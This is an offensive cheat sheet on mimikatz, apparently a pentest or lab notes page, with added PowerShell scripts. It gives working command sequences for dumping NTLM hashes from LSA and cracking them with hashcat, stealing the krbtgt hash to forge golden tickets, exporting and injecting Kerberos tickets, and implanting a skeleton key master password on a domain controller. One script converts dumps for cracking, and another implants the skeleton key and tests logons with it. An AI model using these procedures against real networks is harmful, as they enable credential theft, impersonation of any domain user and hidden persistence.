Mimikatz
Used for dumping user credentials (password hashes and Kerberos tickets) from Windows machines inside an Active Directory network
Summary
cd Downloads && mimikatz.exe
- change into the directory mimikatz is kept in and run the mimikatz binary (from an elevated "Run as administrator" prompt)
privilege::debug
- ensure the output is "Privilege '20' OK". This enables SeDebugPrivilege (LUID 20), which mimikatz needs to read LSASS; the privilege is only available to an elevated administrator session, so if this fails re-launch mimikatz as administrator, otherwise the following commands will not work
lsadump::lsa /patch
- Dump those hashes! This patches the LSA service in memory and reads every account's NT hash; run it on a domain controller to get the domain accounts
Crack those hashes with hashcat (mode 1000 is NTLM; <hash> can be a single hash or a file with one hash per line)
hashcat -m 1000 <hash> rockyou.txt
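The lsadump output is not in a shape hashcat takes directly. The following PowerShell is an added example (not from the original page) that turns a dump in mimikatz's "RID / User / LM / NTLM" layout into a user:hash file for hashcat with --username, skipping entries that cannot be cracked: accounts with no NTLM value, the empty-password hash, machine accounts and krbtgt (random keys). The dump text is a constructed sample, not a real domain.

```powershell
# Added example, not from the original page. The dump below is a constructed sample in the
# layout mimikatz prints for lsadump::lsa /patch; the hashes are not from a real domain.
$lsaDump = @'
Domain : LAB / S-1-5-21-1111111111-2222222222-3333333333

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 8846f7eaee8fb117ad06bdd830b7586c

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 2d7c6a3f5f1a0c8f0b9d2a1e4c5b6a7f

RID  : 00000451 (1105)
User : svc_backup
LM   :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 00000452 (1106)
User : WS01$
LM   :
NTLM : 5c1e9f3a7b2d4e6f8a9b0c1d2e3f4a5b
'@

function ConvertTo-HashcatLines {
    param([Parameter(Mandatory)][string]$DumpText)
    $emptyPasswordHash = '31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of "" - nothing to crack
    $user = $null
    foreach ($line in $DumpText -split "`r?`n") {
        if ($line -match '^\s*User\s*:\s*(\S+)') { $user = $Matches[1]; continue }
        if ($line -match '^\s*NTLM\s*:\s*([0-9a-fA-F]{32})?\s*$') {
            $hash = $Matches[1]
            $crackable = $user -and $hash -and
                         ($hash.ToLower() -ne $emptyPasswordHash) -and
                         ($user -ne 'krbtgt') -and ($user -notlike '*$')   # random 128-bit keys, skip
            if ($crackable) { '{0}:{1}' -f $user, $hash.ToLower() }
            $user = $null
        }
    }
}

ConvertTo-HashcatLines -DumpText $lsaDump | Set-Content -Encoding ascii -Path .\hashes.txt
# Then, offline on the cracking box:
#   hashcat -m 1000 --username hashes.txt rockyou.txt
#   hashcat -m 1000 --username --show hashes.txt    # user:hash:plaintext for the cracked ones
```

With the sample above hashes.txt ends up holding only the Administrator line; Guest (no hash), svc_backup (empty password), krbtgt and the WS01$ machine account are dropped. The --username flag keeps the user name attached to each hash so that --show reports who each cracked password belongs to.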
We first dump the NT hash of the krbtgt account and the domain SID, then forge a golden ticket (a TGT encrypted with the krbtgt key, so the domain controller accepts it as one it issued itself) and use it to open a new command prompt that can authenticate to any machine in the domain as the user named in the ticket. Getting the krbtgt hash requires administrator access to a domain controller; once forged, the ticket stays valid until the krbtgt password has been changed twice.
cd Downloads && mimikatz.exe
privilege::debug
- ensure this outputs "Privilege '20' OK"
lsadump::lsa /inject /name:krbtgt
- This dumps the NT hash of the krbtgt account together with the domain SID. The krbtgt key encrypts every TGT the domain controller issues, so whoever holds it can forge TGTs (golden tickets) for any user in the domain
kerberos::golden /user: /domain: /sid: /krbtgt: /id: /ptt
- /user: is the account to impersonate, /domain: the domain FQDN, /sid: the domain SID (without a trailing user RID), /krbtgt: the NT hash from the previous step and /id: the user's RID (500 for the built-in Administrator). /ptt injects the forged ticket straight into the current logon session; without it mimikatz only writes the ticket to ticket.kirbi and you would have to load it with kerberos::ptt
misc::cmd
- This opens a new command prompt that inherits the current logon session, so every Kerberos authentication from it uses the forged TGT
Access other Machines! The new command prompt now acts as the impersonated user towards every machine in the domain; to verify, list an admin share (c$ or admin$) on a domain controller from it
If the password of a service account is stolen, it can be used to impersonate that user.
Pass the ticket works by dumping Kerberos tickets (TGTs and service tickets) out of LSASS memory on a compromised machine and injecting them into another logon session, which then acts as the ticket's owner until the ticket expires; no password or hash is needed.
cd Downloads
- navigate to the directory mimikatz is in
mimikatz.exe
- run mimikatz (from an elevated prompt)
privilege::debug
- Ensure this outputs "Privilege '20' OK"; if it does not, you do not have the administrator privileges mimikatz needs to read LSASS
sekurlsa::tickets /export
- this exports every Kerberos ticket currently held in LSASS as a .kirbi file into the directory you are in. The file name contains the user and the service, so a TGT ends in <user>@krbtgt-<DOMAIN>.kirbi
At this step you can also use the base64 encoded tickets harvested earlier with Rubeus; mimikatz only loads .kirbi files, so decode the base64 into a file first (Rubeus itself can inject the base64 directly with its ptt command)
Take the admin one, i.e. the TGT of the most privileged account in the list
Now that we have the ticket, we can perform a pass the ticket attack: kerberos::ptt <ticket>
- run this command inside mimikatz with the path of the .kirbi harvested earlier (a directory path loads every .kirbi in it). It injects the ticket into the current logon session, which from then on authenticates as the ticket's owner
klist
- Here we just verify that the injection worked by listing our cached tickets; the injected TGT should show up under its owner's name
You now hold the ticket and have the same rights as its owner until it expires (a TGT is normally valid for 10 hours). To verify, list the admin share of a domain controller.
The skeleton key abuses Kerberos pre-authentication. In the AS-REQ the client sends a timestamp encrypted with a key derived from the user's password (for RC4-HMAC that key is the user's NT hash); the domain controller decrypts the timestamp with the key it stores for that user and, if the decryption checks out, issues a TGT. Once the skeleton key is implanted, the domain controller's LSASS is patched in memory so that it also tries a second key, the skeleton key derived from the master password mimikatz: every account in the domain can then log on with either its real password or the master password, and nobody notices because the real passwords keep working. The patch lives only in memory, so a reboot of the domain controller removes it, and it only affects logons handled by the domain controller it was run on; in a domain with several DCs it has to be installed on each one.
cd Downloads && mimikatz.exe
- Navigate to the directory mimikatz is in and run mimikatz, on the domain controller
privilege::debug
- This should be standard for running mimikatz, as mimikatz needs local administrator access (here on the domain controller)
Installing Skeleton Key
misc::skeleton
- patches the running LSASS of the domain controller; the master password is mimikatz. The patch is in memory only and is gone after a reboot
Accessing the domain. Example: net use \\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
- The share is now accessible with the master password, without needing the Administrator's real password (which keeps working as well, so nothing breaks for the legitimate user)
net use \\Desktop-1\c$ /user:DOMAIN\Machine1 mimikatz
dir \\Desktop-1\c$
- access the C: drive of Desktop-1 as any domain account that has admin rights on Desktop-1 (here Machine1) without knowing that account's password. Only accounts authenticated by the patched domain controller are affected; local accounts of Desktop-1 are checked against its own SAM and still need their real password
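The implant-and-verify steps as one script, added here as an example and not from the original page. It implants the key on the DC and then, from any host, checks which logons the skeleton password is accepted for: a domain account against the DC, the same domain account against a workstation (still authenticated by the DC) and a local account of that workstation, which the DC never sees. DC01, Desktop-1, the domain LAB and the local account Desktop-1\localadmin are assumed names; mimikatz is the default master password.

```powershell
# Added example, not from the original page. Assumed names: DC01, Desktop-1, domain LAB and a
# local account Desktop-1\localadmin. 'mimikatz' is the default skeleton key master password.

# On the domain controller, from an elevated prompt. In-memory only: a reboot removes it, and
# each DC that may answer the logon needs its own copy.
& .\mimikatz.exe 'privilege::debug' 'misc::skeleton' 'exit'

# From any host that can reach the targets: try to map a share with the master password and
# report whether the logon was accepted, then drop the connection again.
function Test-SkeletonLogon {
    param([Parameter(Mandatory)][string]$Share,
          [Parameter(Mandatory)][string]$User,
          [string]$Password = 'mimikatz')
    $output = cmd /c "net use $Share /user:$User $Password 2>&1"
    $works  = ($LASTEXITCODE -eq 0)
    if ($works) { cmd /c "net use $Share /delete /y" | Out-Null }
    [pscustomobject]@{ Share = $Share; User = $User; SkeletonWorks = $works; Message = ($output -join ' ') }
}

Test-SkeletonLogon -Share '\\DC01\admin$'  -User 'LAB\Administrator'     # domain account, checked by the DC: works
Test-SkeletonLogon -Share '\\Desktop-1\c$' -User 'LAB\Administrator'     # domain logon to a member, still checked by the DC: works
Test-SkeletonLogon -Share '\\Desktop-1\c$' -User 'Desktop-1\localadmin'  # local SAM account, never touches the DC: not affected

# Once a check succeeds, browse the share as usual:
#   net use \\Desktop-1\c$ /user:LAB\Administrator mimikatz
#   dir \\Desktop-1\c$
```

Running the same three checks with the accounts' real passwords still succeeds, which is the point of the technique: it adds a password rather than replacing one. The local-account case is the practical limit of the skeleton key: anything that authenticates against a workstation's own SAM, or against a DC that was not patched, is untouched.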